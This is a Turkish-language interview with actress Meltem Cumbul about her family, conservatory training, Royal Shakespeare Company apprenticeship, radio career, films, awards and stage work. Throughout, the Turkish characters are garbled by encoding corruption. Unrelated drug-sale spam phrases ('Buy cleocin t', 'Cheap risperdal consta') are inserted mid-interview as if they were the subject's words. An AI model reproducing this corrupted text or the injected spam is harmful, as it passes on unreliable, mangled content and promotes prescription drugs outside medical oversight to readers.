PAi??nar Erol

KonuAYurken sAi??zcA?kleri serbestAi??e sAi??ralamasAi??ndaki rahatlAi??k yanAi??ltmasAi??n sizi, onlarAi?? kendi derininden bulup Ai??Ai??kartmasAi?? anlam dolu. Ai??Ai??inden sAi??ylediklerini de duyabilmeyi umarak kulak kabartAi??yorum iyice.

Cesur, tutkulu, sorumluluk duygusuna takAi??ntAi??lAi??, toparlayAi??cAi??, Ai??alAi??AYkan, dA?rA?st, samimi, neAYeli… Dayatmalara karAYAi?? Ai??Ai??kAi??AYAi??ndaki kararlAi?? duruAYu, haksAi??zlAi??klara gA?r sesiyle cevap veriAYi anaAi?? bir tanrAi??Ai??aya dAi??nA?AYtA?rA?yor bu yA?rekli kadAi??nAi??… Bir kadAi??nAi??n en gA?zel hali, iAYte o yA?rekli hali. Onun seAi??imi susmamaktan yana. YapAi??p eyleyenler, esip gA?rleyenlerden deAYerlidir. SokaAYAi??n, meydanAi??n haklAi?? sAi??zlerini yanAi??na alarak devam ediyor yoluna, kendi sAi??zlerini de sokaAYa, meydana haykAi??rAi??yor.

BAi??bA?r bAi??bA?r bAi??bA?rlenebileceAYi yaAYamAi??nAi??, usul usul anlatAi??yor. Oyuncu, yAi??netmen, eAYitmen ve sendika baAYkanAi?? olarak sadece burada deAYil; baAYka coAYrafyalarda da bAi??raktAi??AYAi?? ilham dolu izleri tevazunun gA?zelliAYinde bA?yA?tA?yor.

AlAi??AYAi??lanAi??n aksine siz oyunculuk iAi??in ailenizden destek gAi??rA?yorsunuz. Anneniz kendi deyimiyle ai???artistai??? olmayAi?? Ai??ok istemiAY ve siz dAi??rt kardeAYin bA?yA?dA?AYA? rekabetli evde, annenizin sevgisini kazanmak iAi??in onun hayalini gerAi??ekleAYtirmek istiyorsunuz.
Benim kendimi ifade edebildiAYim AYeyler daha Ai??ok dans etmek, taklit etmek gibi eAYlenceli, yaratAi??cAi?? oyunlardAi??. AslAi??nda benim iAi??in repertuvar, belli oyunlardan oluAYuyordu. Bu oyunlar, mevsime gAi??re, gelen misafire gAi??re, mekA?na gAi??re deAYiAYiyor, farklAi??lAi??k gAi??steriyordu. Bu biAi??imiyle de Ai??ocukluAYumun oyun iAi??inde geAi??tiAYini anlatAi??yor durum. DolayAi??sAi??yla da ne olmak istiyorsun dendiAYinde her zaman tiyatrocu, oyuncu dediAYim bir dAi??nem geAi??irdim.

On A?Ai?? yaAYAi??nda Ai??zmirai??i??den Ai??stanbulai??i??a taAYAi??nAi??yorsunuz. Anneniz, oyuncunun aynAi?? zamanda iyi bir dansAi??Ai?? olmasAi?? gerektiAYini sAi??yleyerek Sait SAi??kmenai??i??den ders aldAi??rAi??yor. Ailenize tiyatro okumak istediAYinizi sAi??ylediAYinizde sizi Belediye KonservatuvarAi??ai??i??na gAi??tA?rA?yorlar ama yaAYAi??nAi??z Ai??ok kA?Ai??A?k bulunup, o yaAYtaki bir kAi??zAi??n Lady Macbethai??i??in ihtirasAi??nAi?? anlayamayacaAYAi?? sAi??ylenince ai???onlar benim anlamayacaAYAi??mAi?? nereden biliyorlar?ai??? diye kAi??zAi??yorsunuz.
Annem Ai??ok aAi??Ai??k gAi??rA?AYlA?, vizyon sahibi bir kadAi??ndAi??. O dAi??nemde maddi AYartlarAi??mAi??z Ai??ok uygun olmadAi??AYAi?? iAi??in biriktirdiAYi Ai??eyizleri benim iAi??in satarak, o dans derslerine yolladAi??. Ai??A?nkA? isteAYimin hangi alana odaklAi?? olduAYunu gAi??rdA?. ai???Oyuncu olacaksan iyi dans etmelisin, gA?zel AYarkAi?? sAi??ylemelisinai??? derdi. Okulda da hocalar bu anlamda beni Ai??n plana Ai??Ai??karAi??yorlardAi??. Ai??zmir TA?rk Kolejiai??i??ndeyken de sene sonu gAi??sterilerinde oynadAi??AYAi??m TA?rkAi??e, Ai??ngilizce piyesler olsun, spor bayramlarAi??ndaki dans gAi??sterileri olsun, hep en baAYlarda yer alAi??yordum. Babam da beni Ai??ok desteklerdi, her gAi??steriye gelir, ai???bu benim kAi??zAi??m, bu benim kAi??zAi??mai??? diye herkese tek tek beni gAi??sterirdi. Abim zaten Parisai??i??te yaAYAi??yordu. Onun bakAi??AY aAi??Ai??sAi?? beni birebir eAYitmiAYtir mA?zik konusunda, her anlamda aslAi??nda. Ablam ressam, Ai??ok kA?Ai??A?k yaAYtan itibaren gA?nA?mA? onun sanat tarihi A?zerine olan kitaplarAi??nAi?? okuyarak geAi??irebiliyordum yani.
Sanki bA?tA?n aile el birliAYi ile sizi hazAi??rlamAi??AY.
Buy cleocin t Evet, aynen Ai??yle. Bir de babam edebiyata Ai??ok dA?AYkA?n, AYiire Ai??ok tutkun. Beni AYiirlerle bA?yA?tmA?AY bir kiAYi. Amcam, Galatasaray Lisesi Edebiyat hocasAi?? zaten. Cumbul ailesi Ai??ok vizyon sahibi, Ai??ok eAYitimden yana bir aile. AkAYehir, KonyalAi??lar. Anne tarafAi??m da Ai??yle, onlar da Selanik, Ai??zmirliler. Hep destek gAi??rdA?m yani. Konservatuvar dAi??neminde de ablamlarla yaAYarken, eniAYtemin Ai??ok desteAYini aldAi??m. Okula girdikten sonra da her hocamAi??n Ai??ok desteAYi oldu. O anlamda Ai??ok kendime gA?venli yetiAYtirildiAYimi dA?AYA?nA?yorum.

O kadar kendinize gA?venlisiniz ki A?niversitenin ilk basamaAYAi??nAi?? kazandAi??ktan sonra, ya ikinci basamaAYAi?? da kazanAi??rsam ve ailem beni kazandAi??AYAi??m bAi??lA?me gAi??nderirse diye sAi??navda uyuyorsunuz. GAi??zetmenlerin ai???kaderinle oynuyorsun,ai??? uyarAi??larAi??na , ai???asAi??l bunu yaparsam kaderim deAYiAYecekai??? diye karAYAi??lAi??k veriyorsunuz A?stelik.
Ortaokulda Ai??zmir TA?rk Kolejiai??i??nde iken Ai??ok baAYarAi??lAi??yAi??m. Buraya geldiAYimde Etiler Lisesiai??i??ne gittim Ai??nce. Seksen kiAYilik sAi??nAi??flarda bilemedim yani nereye geldiAYimi. Ai??zmirai??i??de ingilizce eAYitimimiz Ai??ok iyiydi. Daha dA?AYA?k seviyede buldum Ai??stanbulai??i??da kendimi. Onun iAi??in Ai??ok da Ai??nem vermedim aAi??Ai??kAi??asAi??, biraz da keyfim kaAi??tAi??, Ai??stanbulai??i??a da Ai??ok alAi??AYamadAi??m. Ai??lgilenmedim yani. Lise sonda, mezun olduAYum Ata Kolejiai??i??ne geAi??tim. Orada da pek ilgilenmedim derslerle. Ai??lgilendiAYim alan konservatuvara hazAi??rlanmaktAi??. Evet, dediAYiniz gibi kazanAi??rsam beni yollarlar korkusuyla sAi??navda uyuyorum. NAi??betAi??i Ai??AYretmen geldi, ai???kaderinle oynuyorsunai??? dedi bana. ai???Ben kaderimi gayet iyi biliyorum, siz merak etmeyinai??? dedim.

Lisede pek parlak Ai??AYrenci olmasanAi??z da 1991ai??i??de konservatuvardan birincilikle mezun oluyorsunuz ve Londraai??i??ya Stratford-upon-Avonai??i??a gidiyorsunuz. Ai??lk profesyonellik orada baAYlAi??yor.
O baAYarAi?? da kesinlikle benim neyi istediAYimi, tutkumun ne olduAYunu ve bunun karAYAi??lAi??AYAi??nAi?? nasAi??l aldAi??AYAi??mAi?? anlatAi??yor.

Zeliha Berksoy ve Mimar Sinan A?niversitesi Devlet KonservatuarAi?? RektAi??rlA?AYA?, Royal Shakespeare Companyai??i??e bir yazAi?? yazAi??yor. O mektubun kabul gAi??rmesi kolay olmuyor ama sizin giriAYiminiz ve kendine gA?veniniz kesinlikle takdiri hak ediyor.
Tabii ki Ai??nce beni kabul etmiyorlar. Allahai??i??tan Candan GA?rkan, orada sahne yAi??netmeni de, onu buluyorum. Sonra arkadaAY oluyoruz. BAi??ylece girebiliyorum tiyatroya. Ai??lk katAi??ldAi??AYAi??m prova ai???Jules Cesarai???, sonra ai???Thebaiai???ler, ai???As You Like Itai??? (BeAYendiAYiniz Gibi) gibi oyunlarAi??n provalarAi??na katAi??ldAi??m. En son katAi??ldAi??AYAi??m prova Derek Walcottai??i??un o yAi??l Nobel Ai??dA?lA? alan ai???The Odysseyai??? eseriydi. Koreografiyi Beyhan Murphy yapAi??yordu. Onunla da orada tanAi??AYmAi??AYtAi??k. YaklaAYAi??k yedi-sekiz oyunun provasAi??nAi??, teknik provalar da dahil olmak A?zere, takip edebilme, onlara katAi??labilme yirmi bir yaAYAi??nda birinin sahip olabileceAYi en gA?zel ortamdAi??.

Stratfordai??i??dan Londraai??i??ya taAYAi??nAi??yorsunuz, Ai??ngiltereai??i??de kalmaya devam edebilmek iAi??in Radyo Tekai??i??te DJai??i??liAYe baAYlAi??yorsunuz ve hiAi?? beklemediAYiniz bir ilgiyle karAYAi??laAYAi??yorsunuz. Bir yAi??lAi??n sonunda hemen TA?rkiyeai??i??ye dAi??nmek istemedim. O dAi??nemde de Ai??mer Karacanai??i??Ai??n ai???GenAi?? Ai??izgiai???si haftada bir gA?n yayAi??nlanAi??yordu ve o yAi??l en iyi program seAi??ilmiAYti. Onu yapAi??yordum ama oradan kazandAi??AYAi??m para yeterli deAYildi Ai??ngiltereai??i??de kalabilmem iAi??in. Tam o dAi??nemde teklif geldi radyodan. Bu sefer Londraai??i??ya taAYAi??ndAi??m. Orada sabah yayAi??nAi??na baAYladAi??m. Sona buraya dAi??ndA?AYA?mde Power FMai??i??de devam ettim. En Ai??ok dinlenen radyo DJai??i??i oldum, hiAi?? beklemiyordum bAi??yle bir AYeyi. O dAi??nemde de Mehmet Ergen ile tanAi??AYtAi??m. AslAi??nda biz Londraai??i??da Hikmetin GarajAi?? diye bir yerde Ai??alAi??AYmalara baAYlamAi??AYtAi??k birlikte ama ben sabah 05.00ai??i??teki yayAi??na hazAi??rlanmak iAi??in saat 03.30ai??i??da kalktAi??AYAi??m iAi??in, bir de Ai??ok soAYuk bir ortam olduAYu iAi??in, iAYAi??i saAYlAi??AYAi?? ve gA?venliAYi aAi??Ai??sAi??ndan dedim ki, yok yani, buna daha fazla devam etmeyelim. SonrasAi??nda Mehmet ile bir tA?rlA? bir araya gelemedik ta ki 2014ai??i??te Talimhane Tiyatrosuai??i??nda oynadAi??AYAi??mAi??z ai???GAi??l KAi??yAi??sAi??ai???na kadar. O oyun bizim ilk Ai??alAi??AYmamAi??z oldu. 1 Nisan 1993 yAi??lAi??nda radyolarAi??n kapatAi??lmasAi??, korsan yayAi??ncAi??lAi??AYa son verilmesiyle birlikte TA?rkiyeai??i??ye dAi??nA?AYA?m Nisan sonudur. 5 KasAi??m -doAYum gA?nA?mde- aAi??Ai??lmAi??AY olan Power FMai??i??den gelen teklifi deAYerlendirdim, o teklifi doAYum gA?nA? hediyesi olarak aldAi??m ve kabul ettim.

TA?rkiyeai??i??ye dAi??nA?nce Ai??nce radyo ve televizyonda yarAi??AYma programlarAi?? ve ai???Meltem Cumbul Showai??? oluyor. 1993 yAi??lAi??ndan itibaren birAi??ok iAYi bir arada yA?rA?tA?yorsunuz. Radyo programAi??, yarAi??AYma programlarAi??, televizyon AYovlarAi??, ardAi??ndan sinema derken, Ai??zel bir tiyatro kuruyorsunuz, ayrAi??ca baAYka bir tiyatroda da oynuyorsunuz.
Evet, Ai??ok Ai??alAi??AYtAi??AYAi??m bir dAi??nemdi. RagAi??p Yavuzai??i??la Beyaz Sahneai??i??yi kurduk ve Arnold Weskerai??i??in ai???DAi??rt Mevsimai??? eserini sahneledik. Onda Zeyno GAi??nenAi?? oynadAi??, ben yapAi??mcAi??ydAi??m. AynAi?? zamanda Igot Tiyatro iAi??in Marguerite Durasai??i??Ai??n eseri olan ai???AyrAi??lAi??k MA?ziAYiai???ni oynuyordum. SonrasAi??nda AYov ve yarAi??AYma programlarAi?? baAYladAi??. ai???AAYaAYAi?? YukarAi??ai??? adlAi?? yarAi??AYma programAi?? var. Oktay Kaynarca ile yaptAi??AYAi??mAi??z ai???Nereden BaAYlasak, NasAi??l Anlatsakai??? var. TA?rker Ai??nanoAYluai??i??yla yaptAi??AYAi??mAi??z ai???Meltem Cumbul Azovai??? var.

1994ai??i??te Zeki Demirkubuz ai???C Blokai???ta baAYrol teklif ediyor ve kaAi?? kiAYinin atlayacaAYAi?? rolA? siz reddediyorsunuz. Misafir oyunculuk ve yan rollerde piAYmek istiyorsunuz Ai??nce ve Yavuz Ai??zkanai??i??Ai??n ai???Bir Sonbahar HikA?yesiai???nde Zuhal Olcayai??i??Ai??n kAi??z kardeAYini oynuyorsunuz.
Ai??lk baAYrol olarak kabul ettiAYim film de ai???KarAi??AYAi??k Pizzaai???dAi??r. Azimdi ben 34 bedenim. YeAYilAi??amai??i??da o zaman baAYrol oynayan kadAi??nlarAi??n hatlarAi?? daha belirgin. Bir de benim yaAYAi??m da kA?Ai??A?k tabii. YapAi??mcAi?? Faruk Aksoy benim kilo almam gerektiAYini sAi??yledi. Ben de dedim ki; ai???Karakter, bana yazAi??lmAi??AY bir karakter. EAYer bAi??yle dA?AYA?nselerdi benim iAi??in yazmazlardAi?? senaristler. Onun iAi??in, ben de onlara katAi??lAi??yorum ve bu karakter iAi??in kilo almam gerektiAYini dA?AYA?nmA?yorum.ai??? Onlar da benden vazgeAi??tiler. Umur Turagay Ai??ekecek, yAi??netmen olarak, bu da ilk filmi. Dolgun ve olgun bA?tA?n aktristler ile gAi??rA?AYA?yorlar ve sonunda HA?lya AvAYar’la anlaAYAi??yorlar ama HA?lya AvAYar da o dAi??nem hamile kalAi??yor ve beklediklerinden hAi??zlAi?? kilo alAi??yor ve onunla devam edemiyorlar. Bunun A?zerine, baAYka dolgun aktristle gAi??rA?AYA?yorlar ve Umur hiAi??biriyle bir sonuca varamAi??yor. Bir akAYam beni arayAi??p gAi??rA?AYmek istediklerini sAi??ylA?yorlar. Karakteri daha Ai??nceden bildiAYim, A?zerine Ai??alAi??AYtAi??AYAi??m iAi??in de dolgunluk ve olgunluk A?zerine deAYil de karakter A?zerine konuAYuyorum. Umur da ai???ben Meltem’le Ai??alAi??AYmak istiyorum.ai??? diyor ve ai???KarAi??AYAi??k Pizzaai??? ile baAYlayan sA?reAi?? gayet hAi??zlAi?? ilerliyor.

SeAi??me hakkAi??nAi??z olmadan kariyer diye bir AYey oluAYturmaktan bahsedilmemeli. Ai??Bu film (KarAi??AYAi??k Pizza) 1999ai??i??da 4. Sadri AlAi??AYAi??k Ai??dA?lA?ai??i??nA? getiriyor.
Antalya Film Festivali’nde IAYAi??k Yenersu jA?ride yer alAi??yor ve diyor ki; ai???YeAYilAi??am geleneAYinde bAi??yle bir kadAi??n karakter hiAi??bir zaman olmadAi??. Bir kez bir senaristin bAi??yle bir kadAi??n karakter yazmAi??AY olmasAi?? Ai??ok Ai??nemli. Ve bunun oynanmAi??AY olmasAi?? Ai??ok Ai??nemli. Bunun anti-kahraman bir kadAi??ndan yaratAi??lmAi??AY olmasAi?? ve buna baAYrolA?n verilmesi ve buna raAYmen filmin sonunda hA?lA? Ai??lmemesi; yaAYayabilmesi Ai??ok Ai??nemli. Ama o dAi??nemde daha alAi??AYAi??lmadAi??AYAi?? iAi??in bu tarz bir kahramana Ai??ok yanaAYmAi??yorlar. Sadri AlAi??AYAi??k Ai??dA?lA?, ilk kez Ai??dA?l anlamAi??nda bunun bir karAYAi??lAi??AYAi?? olabilmiAYtir. Ben de Ai??ok AYaAYAi??rmAi??AYtAi??m aAi??Ai??kAi??asAi?? ama o dAi??nemde, Viyana’da, ai???DoAYum Yeri AbsA?rdistanai??? filmini Ai??ektiAYim iAi??in Ai??dA?l TAi??reniai??i??ne gidememiAYtim. Benim yerime babam gitmiAYti. Kendisinden Ai??dA?lA? alAi??rken aAYlamamasAi??nAi?? rica ettiAYim halde aAYlamAi??AYtAi??.Tiyatroya da ara vermiAYtim. 1997 yAi??lAi??ndan itibaren radyoyu da bAi??rakmAi??AYtAi??m. Azov programlarAi??nAi?? da bAi??rakmAi??AYtAi??m. O dAi??nem tamamAi??yla sinema A?zerine Ai??alAi??AYAi??yordum. A?st A?ste filmler Ai??ekmeye baAYlamAi??AYtAi??m. ai???Propagandaai???yAi?? yine o dAi??nem Ai??ekmiAYtim. Yine o dAi??nemlerde bir tane de single yaptAi??k Ai??mer Karacan ile. ai???Seninleyimai??? isimli bir parAi??a Ai??Ai??kardAi??k ve Levent Semerci -daha sonra ai???Nefes, Vatan SaAYolsunai??? ve ai???Ayhan HanAi??mai???Ai?? Ai??eken; ilk Ai??alAi??AYmasAi??nAi?? Almanya’dan gelip burada yapmAi??AYtAi?? o video klip ile. Tabii o zamanlarda ben sinemadan para kazanmAi??yordum aAi??Ai??kAi??asAi?? sAi??ylemek gerekirse. Kimse para kazanmAi??yordu. Yani Ai??yle bir dAi??nem deAYildi. Bu yA?zden de bana verilebilecek Ai??ok kA?Ai??A?k bir miktardAi??. Benim oraya harcadAi??AYAi??m emeAYin bir karAYAi??lAi??AYAi?? olmadAi??AYAi?? iAi??in ben o parayAi?? da kabul etmiyordum. Sinema gerAi??ekten Ai??ok fazla emek harcadAi??AYAi??m ve tutkulu olduAYum bir alan oldu. 1999 yAi??lAi??nda iki iAY birden gelmiAYti. Bir tanesi ai???AAYkAi??n DaAYlarda Gezerai??? diye bir iAYti TGRT ile. Bir tanesi de Kanal D iAi??in Osman YaAYmurdereliai??i??nin ai???YAi??lan HikA?yesiai???ydi. Mehmet Ali Alaboraai??i??da o dAi??nemde yan rolde ai???Kara Melekai??? dizisinde oynamAi??AYtAi??. TGRTai??i??nin verdiAYi fiyatla Kanal D’nin verdiAYi fiyat arasAi??nda Ai??ok bA?yA?k bir fark vardAi??. Kanal D’nin verdiAYi Ai??ok cA?zi bir rakamdAi?? ve ben ai???YAi??lan HikA?yesiai???ni kabul ettim. Ai??A?nkA? gerAi??ekten Ai??ok gA?zel bir iAY olacaAYAi??na inandAi??m ve Mehmet Ali’yi de Ai??ok sevdim. GA?zel bir ekip kuruldu.

Dizi fenomen oldu ve siz bu popA?lerliAYi Mehmet Ali Alabora ile tiyatroya yAi??nlendirdiniz ve Azehir TiyatrolarAi??ai??i??nda ai???HAi??rAi??Ai??n KAi??zai???da birlikte oynadAi??nAi??z. Bu, insanlarAi?? yeniden tiyatroya davet eden bir Ai??aAYrAi?? gibiydi. Yine kuyruklar oldu tiyatroda.
Mehmet Ali ile bana birAi??ok reklam ve kampanya teklifi geliyordu. Biz hiAi??birini kabul etmiyorduk. AynAi?? zamanda tiyatrolardan da teklif geliyordu. Bizim niyetimiz o dAi??nemde beAY liraya Shakespeare izletmekti. O dAi??nemde UAYur YA?cel ai???Mavi Odaai???yAi?? yapmak istemiAYti. O da Ai??ok gA?zel bir oyundu. Tam da Nicole Kidman’Ai??n yaptAi??AYAi?? bir dAi??nemde Ai??ok hoAY, gA?ncel olabilecek bir durumdu ama daha bA?yA?k bir kadroyla ai???HAi??rAi??Ai??n KAi??zai???Ai?? yapmayAi?? tercih ettik ve kapalAi?? giAYe oynadAi?? Azehir TiyatrolarAi??’nda. BA?tA?n o popA?laritemizi Azehir Tiyatrosuai??i??na Ai??ok gA?zel aktarabildik, hediye ettik yani. Yine o dAi??nem, Azener Azen ile ai???Mucizeler Komedisiai??? isimli mA?zikali yaptAi??k. Beyhan Murphy de kareografisini yaptAi??. AynAi?? zamanda Urfa’da ai???Gurbet KadAi??nAi??ai??? isimli dizi Ai??ekiyorduk. Ai??ok sevgili arkadaAYAi??m TimuAi??in Esen Amerika’dan dAi??nmA?AYtA?. Yavuz Turgul’un ai???GAi??nA?l YarasAi??ai??? yaza denk geldi…

O filme girmeden, ai???HAi??rAi??Ai??n KAi??zai???Ai?? oynarken suarede gelen telefonla Antalya AltAi??n Portakal Film Festivali’nde ai???AbdA?lhamit DA?AYerkenai??? filmiyle Ai??dA?l aldAi??AYAi??nAi??zAi?? Ai??AYreniyorsunuz. Oyundan sonra Antalyaai??i??ya gidip Ai??dA?lA? alAi??p oradan ai???Gurbet KadAi??nAi??ai???nAi??n setine gidiyorsunuz.
Onun Ai??ncesinde 1997 yAi??lAi??nda ben Strasbourg Film Festivali’ndeyim. Fatih AkAi??n da ilk filmi ai???KAi??sa ve AcAi??sAi??z” ile orada. Kendisi yok; filmi izliyoruz ve Umut Turagay ile hayran oluyoruz. Ben de Faruk GA?naltayai??i??a Fatih AkAi??n’a iletmesi iAi??in kendisiyle tanAi??AYmak ve gAi??rA?AYmek istediAYime dair bir not bAi??rakAi??yorum. Ve biz TA?rkiye’de The Marmara Otel’inde bir araya geliyoruz. O yA?zden ai???Duvara KarAYAi??ai???da benim oynadAi??AYAi??m karakter The Marmara Oteli’nde Ai??alAi??AYAi??r aslAi??nda. O dAi??nemde ai???KAi??sa ve AcAi??sAi??zai???da baAYrol oynayan Mehmet KurtuluAY ile tanAi??AYAi??yoruz. SonrasAi??nda ai???AbdA?lhamit DA?AYerkenai??? iAi??in Ziya Bey bana Ai??nerimi sorunca -ben sorulmadan bir Ai??neride bulunmayAi?? sevmem- Mehmet KurtuluAYai??i??u Ai??neriyorum. ai???AbdA?lhamit DA?AYerkenai???deki rolA?m ile ben yine hiAi?? beklemezken en iyi kadAi??n oyuncu Ai??dA?lA?nA? alAi??yorum. Ben Ai??ok Ai??dA?l beklemem; benim iAi??in filminAi?? Ai??dA?l almasAi?? Ai??ok Ai??nemlidir. BA?tA?ne hizmet verdiAYimi dA?AYA?nA?rA?m her zaman. Hemen arkasAi??ndan ai???Duvara KarAYAi??ai??? sA?reci baAYlAi??yor. Ondan Ai??nceki iAYlerinde de olmamAi?? istiyor ama bir tA?rlA? imkA?n saAYlayamAi??yoruz. Fatih’in niyeti TA?rkiye’ye girebilmek, bu Ai??ok Ai??nemli onun iAi??in. Ai??A?nkA? Fatihai??i??in annesi babasAi?? TA?rk ama o bir Ai??Alman yAi??netmen ve Alman filmleri yapAi??yor. Biz Urfaai??i??da ai???Gurbet KadAi??nAi??ai??? dizisini Ai??ekerken, Berlinale Film Festivali’ne alAi??nmadAi??AYAi??mAi??z sAi??yleniyor. Sonra bir film ekarte ediliyor ve bAi??ylece biz yarAi??AYma bAi??lA?mA?ne alAi??nAi??yoruz ve film Berlin Film Festivali’nde AltAi??n AyAi??ai??i??yAi?? alAi??yor. Bu da hem Birol A?nelai??i??in oyunculuAYunun gAi??sterilmesi, hem Sibel Kekilli gibi bir starAi??n doAYuAYu, hem de filmin TA?rkiye’ye giriAYi aAi??Ai??sAi??ndan Ai??ok daha bA?yA?k bir hediye oluyor bize. AslAi??nda Fatih TA?rkiyeai??i??ye girebilsin amaAi??lAi?? yaptAi??AYAi??mAi??z bir AYeyin uluslararasAi?? bazda bir baAYarAi?? almasAi?? ve aralarAi??nda Martin Scorsese gibi birAi??ok sinemacAi?? tarafAi??ndan ilham alAi??nan bir film haline gelmiAY olmasAi?? Ai??ok kAi??ymetli. Daha sonra ai???GAi??nA?l YarasAi??ai??? sA?recinde Palms Film Festivali’nde En Ai??yi KadAi??n Oyuncu Ai??dA?lA?ai??i??nA? aldAi??AYAi??mda gAi??rA?AYtA?AYA?m John Malkovich, Cate Blanchettai??i??in ai???Duvara KarAYAi??ai???ya ve Fatih AkAi??n’a duyduAYu hayranlAi??k beni Ai??ok mutlu etmiAYti.

Madem Ai??dA?llere deAYindik, diAYer bazAi?? Ai??dA?llerinizden de bahsedelim: 2000ai??i??de ai???DuruAYmaai??? filmindeki Nazan rolA?yle Ankara UluslararasAi?? Film Festivali En Ai??yi KadAi??n Oyuncu Ai??dA?lA?, 2004ai??i??te 11.Ai??ASOD/En Ai??yi Oyuncu Ai??dA?lA?, ai???Tell Me Oh Khudaaai??? ile Osian Onur Ai??dA?lA? ve Quenns YaAYam Boyu Onur OdA?lA?. Bu son Ai??dA?l iAi??in biraz genAi?? sayAi??lmaz mAi??sAi??nAi??z?
Cheap risperdal consta Evet, Queens de ilginAi?? bir sA?reAi??. Benim Amerika’da iki tane hocam var. Birisi A?Ai?? yAi??l boyunca ders yaptAi??AYAi??m ve sistemini Ai??AYrendiAYim Eric Morris. DiAYeri de Black Nexus Actor Studioai??i??nun sahibi Susan Batson. Kendisi Nicole Kidmanai??i??Ai?? ai???Saatlerai??? filmine, Jamie Foxx’u ai???Rayai??? filmine hazAi??rlayan kiAYi. Juliette BinochAi??ai??i??un da yarAi??AYtAi??AYAi?? Palm Springsai??i??ten Ai??dA?l almamla birlikte benimle ilgilenmesi, benimle tanAi??AYmak istemesiyle baAYlayan sA?reAi??le, New York’ta onunla ders yapmaya baAYladAi??m. BirAi??ok Ai??AYrencisi Queensai??i??tendi ve de siyahiydi. Biz de Oscar aday adayAi?? olmuAYtuk. OnlarAi??n da filmi izlemesini Ai??ok istediAYimiz iAi??in sabaha kadar oturup tek tek odalarAi??nAi??n kapAi??larAi??nAi??n altlarAi??ndan davetiye atarak gAi??sterime gelmelerini saAYladAi??k. Bu sA?reAi??te de o gAi??sterime gelen AltAi??n KA?re ekibinden Aida Taklaai??i??nAi??n -daha sonra AltAi??n KA?re baAYkanAi?? olmuAYtur- filme ve bana duyduAYu ilgi ile birlikte baAYlayan dostluk bizi AltAi??n KA?reai??i??de benim AtatA?rkai??i??A?n sAi??zA?nA? sAi??ylediAYim konuAYmaya kadar getirmiAYtir. Queensai??i??in bana bu Ai??dA?lA? vermesinin sebebi tamamAi??yla bu sA?reAi?? ve burada yaAYananlardAi??r. Filmin izlenmesi iAi??in printini omzuma alAi??p Amerika’nAi??n her AYehrinde o filmin gAi??sterilmesi iAi??in Ai??ok uAYraAY verdim.

Ve o Ai??abalarAi??n, kurulan o baAYlarAi??n sonucunu gAi??rmek Ai??ok gA?zel. ai???GAi??nA?l YarasAi??ai??? filmiyle Ai??dA?l aldAi??ktan sonra Ai??dA?llA? bir oyuncu olarak Amerikayaai??i??ya oyunculuk Ai??AYrenmeye gitmeniz de Ai??ok enteresan. GerAi??i bu biraz plansAi??z, buralardan, uzaklaAYmak iAi??in yapAi??lan bir yolculuk. Londra, Berlin ve sonra Mehmet KurtuluAY sizi 10 gA?nlA?AYA?ne Los Angelesai??i??e davet ediyor ve siz orada yAi??llar geAi??iriyorsunuz.
Aynen Ai??yle ve akAi??AY sAi??rasAi??nda Eric Morris ile Ai??alAi??AYmaya baAYlamak… Eric Morrisai??i??e gittiAYimde orada bir haftalAi??AYAi??na gelmiAY olan Mert FAi??rat’la tanAi??AYmakai??i?? Mertai??i??in benim bu kadar Ai??ok Ai??alAi??AYmama, sanki daha Ai??nce hiAi??bir AYey yapmamAi??AY kAi??vamda bir Ai??AYrenci olarak oraya geliAYime ai???sAi??ylesene kim olduAYunuai??? diye baAYAi??rAi??AYAi??nAi?? hatAi??rlamakai??i?? Ai??ok hoAY, Ai??ok tatlAi??, gA?zel bir AYeyai??i?? DevamAi??nda UCLAai??i??de aldAi??AYAi??m Ai??senaryo dersleri… O iki yAi??l iAi??inde Alejandro Chomskiai??i??nin ai???A Beautiful Lifeai??? ve Rob Schmidtai??i??in ai???Alphabet Killerai??? filmlerinde Ai??alAi??AYmam. SonrasAi??nda ai???AAYk Yakarai??? isimli diziyi yazmak A?zere buraya, TA?rkiyeai??i??ye gelmem…

Ai??ncesinde, 2000 yAi??lAi??nda, West End AYovu olan ai???Smokey Joeai??i??s Cafeai??? mA?zikalinin TA?rkiye ayaAYAi??ndaki baAYrol var.
Mydonose Showland Ai??ngiltere’den bir mA?zikal getiriyor. Oyunun iAi??inde bir tane TA?rk oyuncu olsun istiyorlar ve benimle anlaAYAi??yorlar. Solo dansAi??mAi??n ve AYarkAi??mAi??n olduAYu bir mA?zikaldi ve Ai??ok bA?yA?k etki yaratan bir mA?zikal oldu.Ai??On beAY temsil inanAi??lmaz gA?zel geAi??iyor ama annemin vefatAi?? dAi??nemlerine denk geldiAYinden, benim iAi??in hem hA?zA?nlA? bir dAi??nem, hem de ayakta durmamAi?? saAYlayan bir dAi??nem oluyor.

ArdAi??ndan Ankara Devlet Opera ve Balesiai??i??nde konuk sanatAi??Ai?? olarak ai???Seyahatnameai???de yer alAi??yorsunuz.
SanAi??rAi??m 2003 yAi??lAi??ydAi??. Yine Beyhan Murphy ile Ai??alAi??AYAi??yoruz. Cem YAi??lmazai??i??la, Orhan Pamuk ve Evliya Ai??elebi’den metinleri aktarAi??yoruz. Video Ai??ekimleri iAi??in bizimle bir araya gelen yAi??netmen ise Ozan AAi??Ai??ktan. Koray Birand ile hazAi??rlanma sA?reAi??leri Ai??ok keyifli. Ben ofise gideceAYim, TA?rk kahvesi iAi??iyorum diye kahve makinesi almalarAi??… O da AtatA?rk KA?ltA?r Merkezi’nde oynandAi??AYAi?? zaman Ai??ok bA?yA?k etki yaratmAi??AYtAi??. Ai??ok yoAYun Ai??alAi??AYtAi??AYAi??m zamanlardAi??. ai???YAi??lan Hikayesiniai???ni Ai??ektiAYim dAi??nemde bayaAYAi?? uyumadan provaya gitmiAYtim ve yAi??netmen, ai???Seni bu halde provaya almam imkA?nsAi??z. Uykusuzsun, eve gidip dinlenmen, bir gA?n sonra prova yapman gerekirai??? demiAYti. Bu benim burada ilk kez tanAi??klAi??k ettiAYim bir AYeydi. “Vay be demek ki bAi??yle olmasAi?? gerekiyormuAY.” diye dA?AYA?nmA?AYtA?m. Ai??A?nkA? genelde haklarAi??mAi??zAi??n Ai??ok fazla farkAi??nda olmadan Ai??ok uzun zamanlar Ai??alAi??AYAi??p uyumaya bile hakkAi??nAi??z olmadAi??AYAi??nAi?? dA?AYA?ndA?AYA?mA?z uzun gA?nler geceler geAi??irmiAYtim.

Set, beklemek demek olarak algAi??lanAi??r. Bunun doAYal olduAYu sanAi??lAi??rai??i??
IAYAi??AYAi?? zaten beklemek gerekir ama onlarAi??n hepsinin bir Ai??erAi??evede belirlenmesi gerekir. 2000 yAi??lAi?? bunu fark ettiAYim zamandAi??r.

